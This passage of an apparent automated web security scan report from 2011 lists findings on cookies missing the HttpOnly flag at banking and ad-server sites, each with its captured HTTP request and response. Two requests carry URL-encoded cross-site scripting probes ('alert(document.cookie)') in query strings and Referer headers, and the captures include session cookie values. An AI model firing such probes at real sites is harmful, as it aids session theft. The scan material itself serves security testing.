Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=EF949CC12A6233AB

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:00:58 GMT
Content-type: text/html;charset=UTF-8
Cache-control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-cookie: JSESSIONID=A063DC75E80493714CD441148D97EDA0;Path=/;Secure
Set-cookie: wfacookie=B-201102021400581302177828;Domain=.wellsfargo.com;Expires=Sat, 30-Jan-2021 22:00:58 GMT;Path=/
Set-cookie: OB_SO_ORIGIN=source%3Dhomepage;Domain=.wellsfargo.com;Path=/
Set-cookie: WFHOME=PER;Domain=.wellsfargo.com;Expires=Sat, 01-Feb-2014 22:00:58 GMT;Path=/
Content-Length: 19011


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head
...[SNIP]...

11.192. https://www4.usbank.com/internetBanking/RequestRouter  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www4.usbank.com
Path:   /internetBanking/RequestRouter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /internetBanking/RequestRouter HTTP/1.1
Host: www4.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 23:45:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=ISO-8859-1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Language: en-US
Content-Length: 7829
Set-Cookie: JSESSIONIDRIB011=0000QfeDKqBzExihl0t6Sl1rbNV:-1; Path=/internetBanking
Server: WebSphere Application Server/6.1

<html>
<head>

<title>U.S. Bank Internet Banking</title>

<link rel="stylesheet" href="/internetBankingStatic/css/global.css" type="text/css">
</head>
<body>
<MAP NAME="TopNav">
<AREA SHAPE=
...[SNIP]...

11.193. https://www4.usbank.com/internetBanking/RequestRouter  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www4.usbank.com
Path:   /internetBanking/RequestRouter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /internetBanking/RequestRouter HTTP/1.1
Host: www4.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:30:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=ISO-8859-1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Language: en-US
Content-Length: 7828
Set-Cookie: JSESSIONIDRIB09=0000FrNgyz_FdPFwsTt_iMc_-lN:-1; Path=/internetBanking
Server: WebSphere Application Server/6.1

<html>
<head>

<title>U.S. Bank Internet Banking</title>

<link rel="stylesheet" href="/internetBankingStatic/css/global.css" type="text/css">
</head>
<body>
<MAP NAME="TopNav">
<AREA SHAPE=
...[SNIP]...

11.194. https://www4.usbank.com/internetBanking/RequestRouter  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www4.usbank.com
Path:   /internetBanking/RequestRouter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /internetBanking/RequestRouter?requestCmdId=DisplayLoginPage HTTP/1.1
Host: www4.usbank.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:00:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=ISO-8859-1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Language: en-US
Set-Cookie: JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; Path=/internetBanking
Set-Cookie: CAMPID=""; Expires=Sat, 02 Feb 2041 04:23:43 GMT; Path=/; Domain=.usbank.com
Server: WebSphere Application Server/6.1


<noscript>
<HTML>
<HEAD>
<meta http-equiv="Refresh" content="0; URL=https://www4.usbank.com/internetBanking/en_us/info/BrowserRequirementsOut.jsp#enablingjavascript">

<META NAME="keywords" C
...[SNIP]...

11.195. https://www4.usbank.com/internetBanking/en_us/info/BrowserRequirementsOut.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www4.usbank.com
Path:   /internetBanking/en_us/info/BrowserRequirementsOut.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /internetBanking/en_us/info/BrowserRequirementsOut.jsp HTTP/1.1
Host: www4.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:30:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=ISO-8859-1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Language: en-US
Content-Length: 14681
Set-Cookie: JSESSIONIDRIB09=0000K4E52Qoy6PbGS6Z06RA5tSI:-1; Path=/internetBanking
Server: WebSphere Application Server/6.1

<html>

<head>

<title>U.S. Bank Internet Banking</title>

<link rel="stylesheet" href="/internetBankingStatic/css/global.css" type="text/css">

<script language="JavaScript" src="/internetBan
...[SNIP]...

11.196. https://www4.usbank.com/internetBanking/en_us/info/BrowserRequirementsOut.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www4.usbank.com
Path:   /internetBanking/en_us/info/BrowserRequirementsOut.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /internetBanking/en_us/info/BrowserRequirementsOut.jsp HTTP/1.1
Host: www4.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 23:45:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=ISO-8859-1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Language: en-US
Content-Length: 14682
Set-Cookie: JSESSIONIDRIB011=0000ggpvqAphewOgNOFlO8lrK0H:-1; Path=/internetBanking
Server: WebSphere Application Server/6.1

<html>

<head>

<title>U.S. Bank Internet Banking</title>

<link rel="stylesheet" href="/internetBankingStatic/css/global.css" type="text/css">

<script language="JavaScript" src="/internetBan
...[SNIP]...

11.197. https://www4.usbank.com/internetBanking/en_us/info/ContactUsOut.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www4.usbank.com
Path:   /internetBanking/en_us/info/ContactUsOut.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /internetBanking/en_us/info/ContactUsOut.jsp HTTP/1.1
Host: www4.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 23:45:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=ISO-8859-1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Language: en-US
Content-Length: 14538
Set-Cookie: JSESSIONIDRIB011=0000AgcxpIllPHFlV7I1C0_htWM:-1; Path=/internetBanking
Server: WebSphere Application Server/6.1


<html>

<head>

<title>U.S. Bank Internet Banking</title>

<link rel="stylesheet" href="/internetBankingStatic/css/global.css" type="text/css">

<script language="JavaScript" src="/inter
...[SNIP]...

11.198. https://www4.usbank.com/internetBanking/en_us/info/ContactUsOut.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www4.usbank.com
Path:   /internetBanking/en_us/info/ContactUsOut.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /internetBanking/en_us/info/ContactUsOut.jsp HTTP/1.1
Host: www4.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:30:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=ISO-8859-1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Language: en-US
Content-Length: 14537
Set-Cookie: JSESSIONIDRIB09=0000ow2BUtOGja-8V-F7CZsYAu6:-1; Path=/internetBanking
Server: WebSphere Application Server/6.1


<html>

<head>

<title>U.S. Bank Internet Banking</title>

<link rel="stylesheet" href="/internetBankingStatic/css/global.css" type="text/css">

<script language="JavaScript" src="/inter
...[SNIP]...

11.199. https://www6.bankofamerica.com/planning/investments.action  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www6.bankofamerica.com
Path:   /planning/investments.action

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /planning/investments.action HTTP/1.1
Host: www6.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:30:15 GMT
Content-type: text/html
Set-Cookie: TLTSID=01EAE3C62F1C102FF420FC65CDE09FEF; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=01EAE3C62F1C102FF420FC65CDE09FEF; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:30:15 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: no-cache, post-check=0, pre-check=0
Content-language: en-US
Set-cookie: JSESSIONID=0000r3FrrbR9U4oqGFNN1W9Hqpz:12qb4k2ev; Path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...

11.200. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=wareseekercom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=728x90|468x60&p=16284953&a=1&flashVer=10&ver=1.20&center=1&noAd=1&url=http%3A%2F%2Fsearch.wareseeker.com%2Fip-boardc8b75%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E47d05c4592a%2F&rurl=http%3A%2F%2Fburp%2Fshow%2F30&f=0&rnd=16284848 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=arn9a2NZaiMt6memKmHwxrdUs3tYbQRKAXpu2WGR5OjVZdBuEFn93sv7X8ZalwCuq7F0QFYFP3dkBSfkBxAXNnEbfxVOGZbsNxBYCqwmLZbm12GZcXljw7f3HikS9n1bOhCZaj5F8OTFsyVTkN7ZcNnRH2BBBlPyXJhFNDjgcJVvgaVG11CndFwGrWSEZc2naDJGDqftHQnmOHDvd3ePbOL6FaZdDGPg1Lmnn0J9OYX6Zbhbbv4GfpndrHVmW0s1qVrOtS6IP3EdwCpNAPNHMTens1QnwfVYFZb9HSyoPpMngmEQARRrTQDIAvXR3FQ3SYbdA8SQHiZbodgZap2C6ZaZamQrMS1cCcKUHYxod4r4Zb1YydwXbNmyf51VTTd7RQoZd7rH6AYyNUaywojPuhZcvhp

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=ain4xBt3erwAAxv5ACp5UsSCfRTc3eDBInJG6dCqycdA6CDkJUEE1FO3EEFaEMQCKewFpZaiZbJPZc95uCNmeLsZb1q5TrVkYqQRO9guZdb5GrmBn7HFLUiYT9lsvPNmaqZdFMDMrt7xSx1ITHIQVytDmQMe5eljYPUnO1WYEI6jrVrJGuVKbhbbMorcetYvupZb9oZcUXSt9cICE4WBOxtnZdhmOfKCgbyrFyA6hb4y5TnMNrYDcgNZdNDJbJg8hFmFZb8YdUv8nNebjJ1fanP2uupDhsCWD8HUHZb5Qbh8MJ0qr2ju5Ht9lw2gi0jIQMHHZauZbFLtYbbtsDUCrTEHqESCIg; path=/; domain=.tribalfusion.com; expires=Wed, 04-May-2011 01:25:06 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 368

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/ahmMnePb3ZbWbv0VW3WnUjpPFZbNXa3p4TJa4qM5mEfC1rj8Tdn1oArBnVrpodUL5Tv82Hmq5mZbZanUMEXVfP1c3V0GBomEvS5FY2VUfAUAvXPq30QVZbr
...[SNIP]...

11.201. http://ad.thehill.com/www/delivery/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.thehill.com
Path:   /www/delivery/ajs.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/ajs.php HTTP/1.1
Host: ad.thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _OACBLOCK[1930]=1296696352; OAID=308f74733f72a0ba99b5c2e36e2aaec4; __qca=P0-629275191-1296696399668; OAVARS[default]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%222187%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22138%22%3Bs%3A6%3A%22oadest%22%3Bs%3A0%3A%22%22%3B%7D; _OASCCAP[1930]=1;

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Date: Thu, 03 Feb 2011 01:34:58 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OACBLOCK[1930]=deleted; expires=Wed, 03-Feb-2010 01:34:57 GMT; path=/
Set-Cookie: %5FOACBLOCK%5B1930%5D=deleted; expires=Wed, 03-Feb-2010 01:34:57 GMT; path=/
Set-Cookie: _OASCCAP[1930]=deleted; expires=Wed, 03-Feb-2010 01:34:57 GMT; path=/
Set-Cookie: %5FOASCCAP%5B1930%5D=deleted; expires=Wed, 03-Feb-2010 01:34:57 GMT; path=/
Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:34:58 GMT; path=/
Set-Cookie: OACBLOCK=1930.1296696352; expires=Sat, 05-Mar-2011 01:34:58 GMT; path=/
Set-Cookie: OASCCAP=1930.1; path=/
Content-type: application/x-javascript
Connection: close
Server: lighttpd/1.4.22
Content-Length: 2605

var MAX_00e21b1b = '';
MAX_00e21b1b += "<"+"!-- Generated: 01/17/2011 06:39 PM EST. EW Web Code Version: 17.5.1 -->\n";
MAX_00e21b1b += "<"+"script language=\"Javascript\" type=\"text/javascript\">\n
...[SNIP]...

11.202. http://ad.thehill.com/www/delivery/al.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.thehill.com
Path:   /www/delivery/al.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/al.php HTTP/1.1
Host: ad.thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _OACBLOCK[1930]=1296696352; OAID=308f74733f72a0ba99b5c2e36e2aaec4; __qca=P0-629275191-1296696399668; OAVARS[default]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%222187%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22138%22%3Bs%3A6%3A%22oadest%22%3Bs%3A0%3A%22%22%3B%7D; _OASCCAP[1930]=1;

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Date: Thu, 03 Feb 2011 01:35:11 GMT
Content-type: application/x-javascript
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OACBLOCK[1930]=deleted; expires=Wed, 03-Feb-2010 01:35:10 GMT; path=/
Set-Cookie: %5FOACBLOCK%5B1930%5D=deleted; expires=Wed, 03-Feb-2010 01:35:10 GMT; path=/
Set-Cookie: _OASCCAP[1930]=deleted; expires=Wed, 03-Feb-2010 01:35:10 GMT; path=/
Set-Cookie: %5FOASCCAP%5B1930%5D=deleted; expires=Wed, 03-Feb-2010 01:35:10 GMT; path=/
Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:35:11 GMT; path=/
Set-Cookie: OACBLOCK=1930.1296696352; expires=Sat, 05-Mar-2011 01:35:11 GMT; path=/
Set-Cookie: OASCCAP=1930.1; path=/
Connection: close
Server: lighttpd/1.4.22
Content-Length: 6081

var MAX_15b83579 = '';
MAX_15b83579 += "<"+"div id=\"MAX_c15b83579\" style=\"position:absolute; width:308px; height:284px; z-index:98; left: 0px; top: 0px; visibility: hidden\">\n";
MAX_15b83579 += "<
...[SNIP]...

11.203. http://ad.thehill.com/www/delivery/avw.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.thehill.com
Path:   /www/delivery/avw.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/avw.php HTTP/1.1
Host: ad.thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _OACBLOCK[1930]=1296696352; OAID=308f74733f72a0ba99b5c2e36e2aaec4; __qca=P0-629275191-1296696399668; OAVARS[default]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%222187%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22138%22%3Bs%3A6%3A%22oadest%22%3Bs%3A0%3A%22%22%3B%7D; _OASCCAP[1930]=1;

Response

HTTP/1.1 302 Found
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Date: Thu, 03 Feb 2011 01:35:03 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OACBLOCK[1930]=deleted; expires=Wed, 03-Feb-2010 01:35:02 GMT; path=/
Set-Cookie: %5FOACBLOCK%5B1930%5D=deleted; expires=Wed, 03-Feb-2010 01:35:02 GMT; path=/
Set-Cookie: _OASCCAP[1930]=deleted; expires=Wed, 03-Feb-2010 01:35:02 GMT; path=/
Set-Cookie: %5FOASCCAP%5B1930%5D=deleted; expires=Wed, 03-Feb-2010 01:35:02 GMT; path=/
Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:35:03 GMT; path=/
Set-Cookie: OAVARS[default]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%222586%22%3Bs%3A6%3A%22oadest%22%3Bs%3A112%3A%22http%3A%2F%2Fthehill.com%2Fhomenews%2Fsenate%2F116489-wealthy-lawmakers-increased-their-riches-as-economy-sputtered-in-2009-%22%3B%7D; path=/
Set-Cookie: OACBLOCK=1930.1296696352; expires=Sat, 05-Mar-2011 01:35:03 GMT; path=/
Set-Cookie: OASCCAP=1930.1; path=/
Location: http://ad.thehill.com/www/images/richlistsell1.jpg?7afac1b569
Content-type: text/html
Content-Length: 0
Connection: close
Server: lighttpd/1.4.22


11.204. http://ad.thehill.com/www/delivery/ck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.thehill.com
Path:   /www/delivery/ck.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/ck.php HTTP/1.1
Host: ad.thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _OACBLOCK[1930]=1296696352; OAID=308f74733f72a0ba99b5c2e36e2aaec4; __qca=P0-629275191-1296696399668; OAVARS[default]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%222187%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22138%22%3Bs%3A6%3A%22oadest%22%3Bs%3A0%3A%22%22%3B%7D; _OASCCAP[1930]=1;

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Date: Thu, 03 Feb 2011 01:35:09 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OACBLOCK[1930]=deleted; expires=Wed, 03-Feb-2010 01:35:08 GMT; path=/
Set-Cookie: %5FOACBLOCK%5B1930%5D=deleted; expires=Wed, 03-Feb-2010 01:35:08 GMT; path=/
Set-Cookie: _OASCCAP[1930]=deleted; expires=Wed, 03-Feb-2010 01:35:08 GMT; path=/
Set-Cookie: %5FOASCCAP%5B1930%5D=deleted; expires=Wed, 03-Feb-2010 01:35:08 GMT; path=/
Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:35:09 GMT; path=/
Set-Cookie: OACBLOCK=1930.1296696352; expires=Sat, 05-Mar-2011 01:35:09 GMT; path=/
Set-Cookie: OASCCAP=1930.1; path=/
Content-type: text/html
Content-Length: 0
Connection: close
Server: lighttpd/1.4.22


11.205. http://ad.thehill.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.thehill.com
Path:   /www/delivery/lg.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/lg.php?bannerid=6337&campaignid=1930&zoneid=113&OACBLOCK=345600&OASCCAP=1&loc=http%3A%2F%2Fthehill.com%2Fblogs%2Fe2-wire%2F677-e2-wire650aa%27%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E2295b33377e%2F137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more&cb=def1805d3d HTTP/1.1
Host: ad.thehill.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Date: Thu, 03 Feb 2011 01:25:52 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:25:52 GMT; path=/
Set-Cookie: _OASCCAP[1930]=1; path=/
Set-Cookie: _OACBLOCK[1930]=1296696352; expires=Sat, 05-Mar-2011 01:25:52 GMT; path=/
Content-Type: image/gif
Content-Length: 43
Server: lighttpd/1.4.22

GIF89a.............!.......,...........D..;

11.206. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?id=971555&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1791096;type=citi08ft;cat=homechar;ord=1;num=7738084758166.224?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
